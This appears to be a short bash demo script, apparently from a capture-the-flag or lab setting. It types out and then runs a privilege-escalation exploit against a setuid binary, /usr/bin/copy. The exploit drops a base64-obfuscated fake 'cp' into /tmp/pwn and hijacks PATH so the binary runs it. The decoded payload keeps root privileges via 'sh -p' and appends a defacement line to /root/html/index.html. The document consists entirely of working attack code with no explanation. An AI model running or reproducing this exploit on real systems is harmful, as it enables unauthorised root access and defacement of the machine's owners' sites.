#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "mkdir /tmp/pwn; echo 'IyEvYmluL3NoIC1wCmV4cG9ydCBQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2JpbgppZAplY2hvICIxLiBDaGVycnkgY29rZSBydWxlcyB+IEBzenltZXg3MyIgPj4gL3Jvb3QvaHRtbC9pbmRleC5odG1sCg==' | base64 -d > /tmp/pwn/cp; cat /tmp/pwn/cp; chmod 755 /tmp/pwn/cp; PATH=/tmp/pwn /usr/bin/copy" | pv -qL 10 
mkdir /tmp/pwn; echo 'IyEvYmluL3NoIC1wCmV4cG9ydCBQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2JpbgppZAplY2hvICIxLiBDaGVycnkgY29rZSBydWxlcyB+IEBzenltZXg3MyIgPj4gL3Jvb3QvaHRtbC9pbmRleC5odG1sCg==' | base64 -d > /tmp/pwn/cp; cat /tmp/pwn/cp; chmod 755 /tmp/pwn/cp; PATH=/tmp/pwn /usr/bin/copy
exit
